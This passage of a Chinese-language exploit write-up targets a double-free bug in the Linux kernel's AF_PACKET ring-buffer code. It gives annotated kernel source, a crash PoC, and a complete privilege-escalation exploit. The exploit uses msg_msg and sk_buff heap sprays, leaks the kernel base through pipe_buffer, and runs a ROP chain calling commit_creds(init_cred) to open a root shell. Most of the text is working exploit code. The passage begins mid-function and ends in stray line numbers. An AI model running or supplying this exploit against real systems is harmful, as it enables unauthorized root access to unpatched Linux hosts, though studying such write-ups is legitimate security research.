if (unlikely(req->tp_frame_nr)) /* 第二,三次调用setsockopt设置RX_RING时,tp_frame_nr字段必须为'0',不能直接goto out */
goto out;
}

/* Detach socket from network */
spin_lock(&po->bind_lock);
was_running = po->running;
num = po->num;
if (was_running) {
po->num = 0;
__unregister_prot_hook(sk, false);
}
spin_unlock(&po->bind_lock);

synchronize_net();

err = -EBUSY;
mutex_lock(&po->pg_vec_lock);
if (closing || atomic_read(&po->mapped) == 0) {
err = 0;
spin_lock_bh(&rb_queue->lock);
swap(rb->pg_vec, pg_vec); /*
第一次调用setsockopt设置RX_RING时,pg_vec被交换为NULL没有释放
第二次调用setsockopt设置RX_RING时,pg_vec被换回并释放,同时packet_ring_buffer->prb_bdqc->pkbdq为悬空指针 */
if (po->tp_version <= TPACKET_V2)
swap(rb->rx_owner_map, rx_owner_map); /*
第三次调用setsockopt设置RX_RING时,才会进入这里
由于rx_owner_map成员和prb_bdqc成员属于同一个联合体,因此packet_ring_buffer->rx_owner_map和packet_ring_buffer->prb_bdqc->pkbdq的值相同
rx_owner_map被交换为悬空指针,释放造成double free */
rb->frame_max = (req->tp_frame_nr - 1);
rb->head = 0;
rb->frame_size = req->tp_frame_size;
spin_unlock_bh(&rb_queue->lock);

swap(rb->pg_vec_order, order);
swap(rb->pg_vec_len, req->tp_block_nr);

rb->pg_vec_pages = req->tp_block_size/PAGE_SIZE;
po->prot_hook.func = (po->rx_ring.pg_vec) ?
tpacket_rcv : packet_rcv;
skb_queue_purge(rb_queue);
if (atomic_read(&po->mapped))
pr_err("packet_mmap: vma is busy: %d\n",
atomic_read(&po->mapped));
}
mutex_unlock(&po->pg_vec_lock);

spin_lock(&po->bind_lock);
if (was_running) {
po->num = num;
register_prot_hook(sk);
}
spin_unlock(&po->bind_lock);
if (pg_vec && (po->tp_version > TPACKET_V2)) {
/* Because we don't support block-based V3 on tx-ring */
if (!tx_ring)
prb_shutdown_retire_blk_timer(po, rb_queue);
}

out_free_pg_vec:
bitmap_free(rx_owner_map); /* 释放rx_owner_map */
if (pg_vec)
free_pg_vec(pg_vec, order, req->tp_block_nr); /* 释放pg_vec */
out:
return err;
}

其他次要部分源码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
static void init_prb_bdqc(struct packet_sock *po,
struct packet_ring_buffer *rb,
struct pgv *pg_vec,
union tpacket_req_u *req_u)
{
struct tpacket_kbdq_core *p1 = GET_PBDQC_FROM_RB(rb);
struct tpacket_block_desc *pbd;

memset(p1, 0x0, sizeof(*p1));

p1->knxt_seq_num = 1;
p1->pkbdq = pg_vec; /* sock->rx_ring->prb_bdqc->pkbdq引用了pg_vec,造成漏洞的关键行为 */
......
}
1
2
3
4
5
6
7
8
9
10
11
12
13
struct packet_ring_buffer {
struct pgv *pg_vec;
......
union { /* rx_owner_map成员和prb_bdqc成员属于同一个联合体 */
unsigned long *rx_owner_map;
struct tpacket_kbdq_core prb_bdqc;
};
};

struct tpacket_kbdq_core {
struct pgv *pkbdq;
......
};

下面是触发内核报错的 Poc:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <string.h>
#include <sys/prctl.h>

#include "kernelpwn.h"

#define PAGE_SIZE 0x1000

int main(int argc , char **argv, char **envp)
{
save_status();
bind_core(0);
unshare_setup();

int socket_fd,version,ret;
struct tpacket_req3 req3;
memset(&req3, 0, sizeof(req3));

/* 调用socket函数创建AF_PACKET套接字 */
socket_fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
if (socket_fd < 0) {
err_exit("[x] failed at socket(AF_PACKET, SOCK_RAW, PF_PACKET)\n");
}

/* 调用setsockopt设置协议版本为TPACKET_V3 */
version = TPACKET_V3;
ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION, &version, sizeof(version));
if(ret < 0) {
err_exit("[x] failed at setsockopt(PACKET_VERSION)\n");
}

/* 调用setsockopt设置RX_RING(正常给tpacket_req3配置参数) */
req3.tp_sizeof_priv = 0;
req3.tp_block_nr = 0x410 / 8;
req3.tp_block_size = 0x1000;
req3.tp_frame_size = 0x1000;
req3.tp_frame_nr = 0x410 / 8;
req3.tp_retire_blk_tov = 0;
req3.tp_feature_req_word = 0;
ret = setsockopt(socket_fd, SOL_PACKET, PACKET_RX_RING, &req3, sizeof(req3));
if (ret < 0){
err_exit("[-] setsockopt (PACKET_RX_RING)");
}

/* 调用setsockopt设置RX_RING(将tpacket_req3参数的tp_block_nr和tp_frame_nr字段设置为'0') */
req3.tp_sizeof_priv = 0;
req3.tp_block_nr = 0;
req3.tp_block_size = 0;
req3.tp_frame_size = 0;
req3.tp_frame_nr = 0;
req3.tp_retire_blk_tov = 0;
req3.tp_feature_req_word = 0;
ret = setsockopt(socket_fd, SOL_PACKET, PACKET_RX_RING, &req3, sizeof(req3));
if (ret < 0){
err_exit("[-] setsockopt (PACKET_RX_RING)");
}

/* 调用setsockopt设置协议版本为TPACKET_V2 */
version = TPACKET_V2;
ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION, &version, sizeof(version));
if(ret < 0) {
err_exit("[x] failed at setsockopt(PACKET_VERSION)\n");
}

/* 调用setsockopt设置RX_RING(此时tpacket_req参数的tp_block_nr字段必须为'0') */
req3.tp_sizeof_priv = 0;
req3.tp_block_nr = 0;
req3.tp_block_size = 0;
req3.tp_frame_size = 0;
req3.tp_frame_nr = 0;
req3.tp_retire_blk_tov = 0;
req3.tp_feature_req_word = 0;
ret = setsockopt(socket_fd, SOL_PACKET, PACKET_RX_RING, &req3, sizeof(req3));
if (ret < 0){
err_exit("[-] setsockopt (PACKET_RX_RING)");
}

return 0;
}
1
2
3
4
5
6
7
/ $ ./exp
[*] Status has been saved.
[*] Process binded to core 0
[ 48.293367] kernel BUG at mm/slub.c:305!
[ 48.294485] invalid opcode: 0000 [#1] SMP PTI
[ 48.294770] CPU: 0 PID: 122 Comm: exp Not tainted 5.11.16 #1
[ 48.295009] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.13.0-1ubuntu1.1 04/01/2014

触发过程详解:

  • 第一次调用 setsockopt 设置 RX_RING:
    • 在执行 packet_set_ring 函数过程中,pg_vec 指向 alloc_pg_vec 函数分配的内存,并且调用 init_prb_bdqc 函数(导致 pg_vecsock->rx_ring->prb_bdqc->pkbdq 引用)
    • 调用 swap 函数将 pg_vecsock->rx_ring->pg_vec 交换,函数最后 pg_vec 指向 NULL,没有调用 free
  • 第二次调用 setsockopt 设置 RX_RING:
    • 调用 swap 函数将 pg_vecsock->rx_ring->pg_vec 交换,此时 sock->rx_ring->pg_vec 为 NULL
    • pg_vec 指向上一步骤分配的内存,函数结尾调用 free_pg_vec 释放 pg_vec,此时 packet_ring_buffer->prb_bdqc->pkbdq 成为悬空指针
  • 由于 sock->rx_ring->pg_vec 为 NULL,所以该套接字可以成功切换协议 TPACKET_V2
  • 第三次调用 setsockopt 设置 RX_RING:
    • 再次进入 packet_set_ring 函数,由于已经是 TPACKET_V2 协议,所以调用了 swap 函数交换了 rx_owner_mapsock->rx_ring->rx_owner_map
    • 由于 packet_ring_buffer 结构体的 rx_owner_map 成员和 prb_bdqc 成员属于联合体,所以 sock->rx_ring->rx_owner_mapsock->rx_ring->prb_bdqc->pkbdq 的值相同
    • 之前 packet_ring_buffer->prb_bdqc->pkbdq 成为悬空指针,所以在函数结尾调用 bitmap_free(rx_owner_map),等同于 free 掉 sock->rx_ring->prb_bdqc->pkbdq 这个悬空指针,造成 double free

入侵思路

先泄露内核基地址以绕过 KASLR,由于这里有两次 free,因此我们选择使用 msg_msg + sk_buff 的方法进行泄露

构造消息队列,并分别在每一个消息队列上发送两条消息:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
for (int i = 0; i < MSG_QUEUE_NUM; i++)
{
*(int *)&primary_msg.mtext[0] = MSG_TAG;
*(int *)&primary_msg.mtext[4] = i;
if (write_msg(msqid[i], &primary_msg, sizeof(primary_msg), PRIMARY_MSG_TYPE) < 0)
err_exit("failed to send primary msg!");

*(int *)&secondary_msg.mtext[0] = MSG_TAG;
*(int *)&secondary_msg.mtext[4] = i;
if (write_msg(msqid[i], &secondary_msg, sizeof(secondary_msg), SECONDARY_MSG_TYPE) < 0)
err_exit("failed to send secondary msg!");

if (i == 1024){
do_free_first(socket_fd);
}
}

do_free_second(socket_fd);
  • 内存布局如下:

1701342306217

  • 由于 slub 算法的特性,kmalloc-1k 会被分配到相邻的内存空间,kmalloc-96 会被分配到相邻的内存空间,两者互不干扰
  • msg_queue,primary,secondary 通过 primary_msg->m_listsecondary_msg->m_list 相关联

第一次堆喷:构造 UAF,堆喷 sk_buff 定位 victim 队列

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
   init_socket_array(sk_sockets);
puts("[*] spray sk_buff...");
/* msg_msg->m_ts从'0x400-0x30'被改为'0x400' */
build_msg((struct msg_msg *)fake_secondary_msg, *(uint64_t *)"yhellow", *(uint64_t *)"yhellow", VICTIM_MSG_TYPE, SECONDARY_MSG_SIZE, 0, 0);
if (spray_sk_buff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
err_exit("failed to spray sk_buff!"); /* 有一个sk_buff会命中UAF */

victim_qid = -1;
for (int i = 0; i < MSG_QUEUE_NUM; i++)
{
if (peek_msg(msqid[i], &secondary_msg, sizeof(secondary_msg), 1) < 0){
/* 因为msg_msg被修改导致peek_msg失败(利用这一点可以定位victim_qid) */
printf("[+] victim qid: %d\n", i);
victim_qid = i;
}
}
if (victim_qid == -1)
err_exit("failed to make the UAF in msg queue!");
  • 内存布局如下:

1701342638468

第二次堆喷:堆喷 sk_buff 伪造辅助消息,泄露 primary_msg 地址

1
2
3
4
5
6
7
8
9
10
11
12
13
14
/* msg_msg->m_ts从'0x400'被改为'0x1000-0x30' */
build_msg((struct msg_msg *)fake_secondary_msg, *(uint64_t*)"yhellow", *(uint64_t*)"yhellow", VICTIM_MSG_TYPE, 0x1000 - sizeof(struct msg_msg), 0, 0);
if (spray_sk_buff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
err_exit("failed to spray sk_buff!");

if (peek_msg(msqid[victim_qid], &oob_msg, sizeof(oob_msg), 1) < 0)
err_exit("failed to read victim msg!");

if (*(int *)&oob_msg.mtext[SECONDARY_MSG_SIZE+0x10] != MSG_TAG){
err_exit("failed to rehit the UAF object!");
}

nearby_msg = (struct msg_msg*)&oob_msg.mtext[(SECONDARY_MSG_SIZE+0x10) - sizeof(struct msg_msg)];
printf("\033[32m\033[1m[+] addr of primary msg of msg nearby victim: \033[0m0x%lx\n", nearby_msg->m_list.prev);
  • 内存布局如下:

1701342780014

  • 越界读取到相邻辅助消息的 secondary_msg->msg_msg,泄露对应 primary_msg 的地址

第三次堆喷:堆喷 sk_buff 伪造辅助消息,泄露 UAF obj 地址

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
/* msg_msg->next被改为nearby_msg->m_list.prev(泄露的primary_msg地址) */
build_msg((struct msg_msg *)fake_secondary_msg, *(uint64_t*)"yhellow", *(uint64_t*)"yhellow", VICTIM_MSG_TYPE, sizeof(oob_msg.mtext), nearby_msg->m_list.prev - 8, 0);
if (spray_sk_buff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
err_exit("failed to spray sk_buff!");

puts("[*] arbitrary read on primary msg of msg nearby victim");
if (peek_msg(msqid[victim_qid], &oob_msg, sizeof(oob_msg), 1) < 0)
err_exit("failed to read victim msg!");

if (*(int *)&oob_msg.mtext[0x1000] != MSG_TAG)
err_exit("failed to rehit the UAF object!");

nearby_msg_prim = (struct msg_msg*) &oob_msg.mtext[0x1000 - sizeof(struct msg_msg)];
victim_addr = nearby_msg_prim->m_list.next - 0x400;

printf("\033[32m\033[1m[+] addr of msg next to victim: \033[0m0x%lx\n", nearby_msg_prim->m_list.next);
printf("\033[32m\033[1m[+] addr of msg UAF object: \033[0m0x%lx\n", victim_addr);
  • 内存布局如下:

1701343615421

  • msg_msg data 的 0x1000-0x30 空间使用完毕后,程序就会根据 msg_msg->next 来确定 msg_msgseg data 的位置
  • msg_msg->next 修改为 primary_addr,就可以读取并泄露 primary->m_list.next ,也就是 secondary->msg_msg
  • 最后减去 0x400 就得到 victim_addr 了

第四次堆喷:堆喷 pipe_buffer,泄露内核基址

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
   /* msg_msg->m_list被改为victim_addr(指向自身) */
build_msg((struct msg_msg *)fake_secondary_msg, victim_addr, victim_addr, VICTIM_MSG_TYPE, SECONDARY_MSG_SIZE - sizeof(struct msg_msg), 0, 0);
if (spray_sk_buff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
err_exit("failed to spray sk_buff!");

/* read_msg会导致secondary_msg被释放 */
if (read_msg(msqid[victim_qid], &secondary_msg, sizeof(secondary_msg), VICTIM_MSG_TYPE) < 0)
err_exit("failed to receive secondary msg!");

for (int i = 0; i < PIPE_NUM; i++)
{
if (pipe(pipe_fd[i]) < 0)
err_exit("failed to create pipe!");

if (write(pipe_fd[i][1], "yhellow", 8) < 0)
err_exit("failed to write the pipe!");
}

pipe_buf_ptr = (struct pipe_buffer *) &fake_secondary_msg;
for (int i = 0; i < SOCKET_NUM; i++)
{
for (int j = 0; j < SK_BUFF_NUM; j++)
{
/* 通过sk_buff读取pipe_buffer */
if (read(sk_sockets[i][1], &fake_secondary_msg,
sizeof(fake_secondary_msg)) < 0)
err_exit("failed to release sk_buff!");

if (pipe_buf_ptr->ops > 0xffffffff81000000){
print_hex(pipe_buf_ptr,sizeof(struct pipe_buffer));
printf("\033[32m\033[1m[+] got anon_pipe_buf_ops: \033[0m%p\n", pipe_buf_ptr->ops);
kernel_offset = (uint64_t)pipe_buf_ptr->ops - 0xffffffff8223d800;
kernel_base = 0xffffffff81000000 + kernel_offset;
}
}
}

printf("\033[32m\033[1m[+] kernel base: \033[0m0x%lx \033[32m\033[1moffset: \033[0m0x%lx\n", kernel_base, kernel_offset);
  • 内存布局如下:

1701346455159

  • read_msg 没有设置 MSG_COPY,读取后便会从信息队列中释放 secondary_msg
  • 但是 sk_buff 中的指针并没有置空,导致 pipe_buffersk_buff 分配的区域在同一位置

接下来可以考虑伪造 pipe_buffer,构造 ROP,劫持 RIP,完成提权

1
2
3
4
5
6
pwndbg> p &init_cred
$1 = (struct cred *) 0xffffffff82889040 <init_cred>
pwndbg> p commit_creds
$2 = {int (struct cred *)} 0xffffffff810df150 <commit_creds>
pwndbg> p swapgs_restore_regs_and_return_to_usermode
$3 = {<text variable, no debug info>} 0xffffffff81e00fb0 <common_interrupt_return>

栈迁移的 gadget 有点难找,需要指令错位,但好在各个版本的内核都有这个 gadget:

1
2
3
4
5
6
7
8
.text:FFFFFFFF8130245D 8B 56 5C                      mov     edx, [rsi+5Ch]
.text:FFFFFFFF81302460 85 D2 test edx, edx
.text:FFFFFFFF81302462 0F 8E A0 00 00 00 jle loc_FFFFFFFF81302508
.text:FFFFFFFF81302462
.text:FFFFFFFF81302468 F0 FF 46 60 lock inc dword ptr [rsi+60h]
.text:FFFFFFFF8130246C 4C 8D 6B 0C lea r13, [rbx+0Ch]
.text:FFFFFFFF81302470 4C 89 EF mov rdi, r13 ; lock
.text:FFFFFFFF81302473 E8 E8 EE 9E 00 call _raw_spin_lock ; PIC mode

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <string.h>
#include <sys/prctl.h>

#include "kernelpwn.h"

#define PG_NUM 256
#define PIPE_NUM 8
#define MSG_QUEUE_NUM 4096

#define PRIMARY_MSG_SIZE 96
#define SECONDARY_MSG_SIZE 0x400-0x10

#define PRIMARY_MSG_TYPE 0x31
#define SECONDARY_MSG_TYPE 0x32
#define VICTIM_MSG_TYPE 0x1337
#define OTHER_MSG_TYPE 0x33
#define MSG_TAG 0xAAAAAAAA

#define PAGE_SIZE 0x1000

int do_alloc_pg_vec(uint32_t block_size, uint32_t frame_size,
uint32_t block_nr, uint32_t sizeof_priv, int timeout){
struct tpacket_req3 req3;
memset(&req3, 0, sizeof(req3));
int socket_fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
if (socket_fd < 0) {
err_exit("[x] failed at socket(AF_PACKET, SOCK_RAW, PF_PACKET)\n");
}

int version = TPACKET_V3;
int ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION, &version, sizeof(version));
if(ret < 0) {
err_exit("[x] failed at setsockopt(PACKET_VERSION)\n");
}

req3.tp_sizeof_priv = sizeof_priv;
req3.tp_block_nr = block_nr;
req3.tp_block_size = block_size;
req3.tp_frame_size = frame_size;
req3.tp_frame_nr = (block_size * block_nr) / frame_size;
req3.tp_retire_blk_tov = timeout;
req3.tp_feature_req_word = 0;
ret = setsockopt(socket_fd, SOL_PACKET, PACKET_RX_RING, &req3, sizeof(req3));
if (ret < 0){
err_exit("[-] setsockopt (PACKET_RX_RING)");
}
return socket_fd;
}


void do_free_first(int socket_fd){
struct tpacket_req3 req3;
memset(&req3, 0, sizeof(req3));
req3.tp_sizeof_priv = 0;
req3.tp_block_nr = 0;
req3.tp_block_size = 0;
req3.tp_frame_size = 0;
req3.tp_frame_nr = 0;
req3.tp_retire_blk_tov = 0;
req3.tp_feature_req_word = 0;
int ret = setsockopt(socket_fd, SOL_PACKET, PACKET_RX_RING, &req3, sizeof(req3));
if (ret < 0){
err_exit("[-] setsockopt (PACKET_RX_RING)");
}
}

void do_free_second(int socket_fd){
struct tpacket_req3 req3;
int version = TPACKET_V2;
int ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION, &version, sizeof(version));
memset(&req3, 0, sizeof(req3));
if(ret < 0) {
err_exit("[x] failed at setsockopt(PACKET_VERSION)\n");
}

req3.tp_sizeof_priv = 0;
req3.tp_block_nr = 0;
req3.tp_block_size = 0;
req3.tp_frame_size = 0;
req3.tp_frame_nr = 0;
req3.tp_retire_blk_tov = 0;
req3.tp_feature_req_word = 0;
ret = setsockopt(socket_fd, SOL_PACKET, PACKET_RX_RING, &req3, sizeof(req3));
if (ret < 0){
err_exit("[-] setsockopt (PACKET_RX_RING)");
}
}

struct
{
long mtype;
char mtext[PRIMARY_MSG_SIZE - sizeof(struct msg_msg)];
}primary_msg;

struct
{
long mtype;
char mtext[SECONDARY_MSG_SIZE - sizeof(struct msg_msg)];
}secondary_msg;

struct
{
long mtype;
char mtext[0x1000 - sizeof(struct msg_msg) + 0x1000 - sizeof(struct msg_msgseg)];
} oob_msg;

/*
* skb_shared_info need to take 320 bytes at the tail
* so the max size of buf we should send is:
* 1024 - 320 = 704
*/
char fake_secondary_msg[704];

int main(int argc , char **argv, char **envp)
{
int msqid[MSG_QUEUE_NUM];
int packet_fds[PG_NUM];
int sk_sockets[SOCKET_NUM][2];
int pipe_fd[PIPE_NUM][2];
int socket_fd;
uint64_t victim_addr;
uint64_t victim_qid;
struct msg_msg *nearby_msg;
struct msg_msg *nearby_msg_prim;
struct pipe_buffer* pipe_buf_ptr;
struct pipe_buf_operations *ops_ptr;
uint64_t *rop_chain;
int rop_idx;
save_status();
bind_core(0);
unshare_setup();

socket_fd = do_alloc_pg_vec(PAGE_SIZE, 0x800, 0x400/8, 0, 1000);

for (int i = 0; i < MSG_QUEUE_NUM; i++){
if ((msqid[i] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) < 0)
err_exit("failed to create msg_queue!");
}

memset(&primary_msg, 0, sizeof(primary_msg));
memset(&secondary_msg, 0, sizeof(secondary_msg));

for (int i = 0; i < MSG_QUEUE_NUM; i++)
{
*(int *)&primary_msg.mtext[0] = MSG_TAG;
*(int *)&primary_msg.mtext[4] = i;
if (write_msg(msqid[i], &primary_msg, sizeof(primary_msg), PRIMARY_MSG_TYPE) < 0)
err_exit("failed to send primary msg!");

*(int *)&secondary_msg.mtext[0] = MSG_TAG;
*(int *)&secondary_msg.mtext[4] = i;
if (write_msg(msqid[i], &secondary_msg, sizeof(secondary_msg), SECONDARY_MSG_TYPE) < 0)
err_exit("failed to send secondary msg!");

if (i == 1024){
do_free_first(socket_fd);
}
}

do_free_second(socket_fd);

init_socket_array(sk_sockets);
puts("[*] spray sk_buff...");
build_msg((struct msg_msg *)fake_secondary_msg, *(uint64_t *)"yhellow", *(uint64_t *)"yhellow", VICTIM_MSG_TYPE, SECONDARY_MSG_SIZE, 0, 0);
if (spray_sk_buff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
err_exit("failed to spray sk_buff!");

victim_qid = -1;
for (int i = 0; i < MSG_QUEUE_NUM; i++)
{
if (peek_msg(msqid[i], &secondary_msg, sizeof(secondary_msg), 1) < 0){
printf("[+] victim qid: %d\n", i);
victim_qid = i;
}
}
if (victim_qid == -1)
err_exit("failed to make the UAF in msg queue!");

if (free_sk_buff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
err_exit("failed to release sk_buff!");

build_msg((struct msg_msg *)fake_secondary_msg, *(uint64_t*)"yhellow", *(uint64_t*)"yhellow", VICTIM_MSG_TYPE, 0x1000 - sizeof(struct msg_msg), 0, 0);
if (spray_sk_buff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
err_exit("failed to spray sk_buff!");

if (peek_msg(msqid[victim_qid], &oob_msg, sizeof(oob_msg), 1) < 0)
err_exit("failed to read victim msg!");

if (*(int *)&oob_msg.mtext[SECONDARY_MSG_SIZE+0x10] != MSG_TAG){
err_exit("failed to rehit the UAF object!");
}

nearby_msg = (struct msg_msg*)&oob_msg.mtext[(SECONDARY_MSG_SIZE+0x10) - sizeof(struct msg_msg)];
printf("\033[32m\033[1m[+] addr of primary msg of msg nearby victim: \033[0m0x%lx\n", nearby_msg->m_list.prev);

if (free_sk_buff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
err_exit("failed to release sk_buff!");

build_msg((struct msg_msg *)fake_secondary_msg, *(uint64_t*)"yhellow", *(uint64_t*)"yhellow", VICTIM_MSG_TYPE, sizeof(oob_msg.mtext), nearby_msg->m_list.prev - 8, 0);
if (spray_sk_buff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
err_exit("failed to spray sk_buff!");

puts("[*] arbitrary read on primary msg of msg nearby victim");
if (peek_msg(msqid[victim_qid], &oob_msg, sizeof(oob_msg), 1) < 0)
err_exit("failed to read victim msg!");

if (*(int *)&oob_msg.mtext[0x1000] != MSG_TAG)
err_exit("failed to rehit the UAF object!");

nearby_msg_prim = (struct msg_msg*) &oob_msg.mtext[0x1000 - sizeof(struct msg_msg)];
victim_addr = nearby_msg_prim->m_list.next - 0x400;

printf("\033[32m\033[1m[+] addr of msg next to victim: \033[0m0x%lx\n", nearby_msg_prim->m_list.next);
printf("\033[32m\033[1m[+] addr of msg UAF object: \033[0m0x%lx\n", victim_addr);

if (free_sk_buff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
err_exit("failed to release sk_buff!");

memset(fake_secondary_msg, 0, sizeof(fake_secondary_msg));
build_msg((struct msg_msg *)fake_secondary_msg, victim_addr, victim_addr, VICTIM_MSG_TYPE, SECONDARY_MSG_SIZE - sizeof(struct msg_msg), 0, 0);
if (spray_sk_buff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
err_exit("failed to spray sk_buff!");

if (read_msg(msqid[victim_qid], &secondary_msg, sizeof(secondary_msg), VICTIM_MSG_TYPE) < 0)
err_exit("failed to receive secondary msg!");

for (int i = 0; i < PIPE_NUM; i++)
{
if (pipe(pipe_fd[i]) < 0)
err_exit("failed to create pipe!");

if (write(pipe_fd[i][1], "yhellow", 8) < 0)
err_exit("failed to write the pipe!");
}

pipe_buf_ptr = (struct pipe_buffer *) &fake_secondary_msg;
for (int i = 0; i < SOCKET_NUM; i++)
{
for (int j = 0; j < SK_BUFF_NUM; j++)
{
if (read(sk_sockets[i][1], &fake_secondary_msg,
sizeof(fake_secondary_msg)) < 0)
err_exit("failed to release sk_buff!");

if (pipe_buf_ptr->ops > 0xffffffff81000000){
print_hex(pipe_buf_ptr,sizeof(struct pipe_buffer));
printf("\033[32m\033[1m[+] got anon_pipe_buf_ops: \033[0m%p\n", pipe_buf_ptr->ops);
kernel_offset = (uint64_t)pipe_buf_ptr->ops - 0xffffffff8223d800;
kernel_base = 0xffffffff81000000 + kernel_offset;
memcpy(&secondary_msg,&fake_secondary_msg,sizeof(secondary_msg));
}
}
}

printf("\033[32m\033[1m[+] kernel base: \033[0m0x%lx \033[32m\033[1moffset: \033[0m0x%lx\n", kernel_base, kernel_offset);

pipe_buf_ptr = (struct pipe_buffer *) fake_secondary_msg;
pipe_buf_ptr->page = *(uint64_t*) "yhellow";
pipe_buf_ptr->ops = victim_addr + 0x100;

ops_ptr = (struct pipe_buf_operations *) &fake_secondary_msg[0x100];
ops_ptr->release = 0xffffffff8130245e + kernel_offset; // PUSH_RSI_POP_RSP_POP_4VAL_RET

rop_idx = 0;
rop_chain = (uint64_t*) &fake_secondary_msg[0x20];
rop_chain[rop_idx++] = kernel_offset + 0xffffffff8100f530; // pop_rdi_ret
rop_chain[rop_idx++] = kernel_offset + 0xffffffff82889040; // INIT_CRED
rop_chain[rop_idx++] = kernel_offset + 0xffffffff810df150; // COMMIT_CREDS
rop_chain[rop_idx++] = kernel_offset + 0xffffffff81e00fb0+22; // SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE + 22;
rop_chain[rop_idx++] = *(uint64_t*) "yhellow";
rop_chain[rop_idx++] = *(uint64_t*) "yhellow";
rop_chain[rop_idx++] = get_root_shell;
rop_chain[rop_idx++] = user_cs;
rop_chain[rop_idx++] = user_rflags;
rop_chain[rop_idx++] = user_sp;
rop_chain[rop_idx++] = user_ss;

if (spray_sk_buff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
err_exit("failed to spray sk_buff!");

// for gdb attach only
printf("[*] gadget: %p\n", kernel_offset + 0xffffffff8130245e);
sleep(5);

puts("[*] trigger fake ops->release to hijack RIP...");
for (int i = 0; i < PIPE_NUM; i++)
{
close(pipe_fd[i][0]);
close(pipe_fd[i][1]);
}

return 0;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
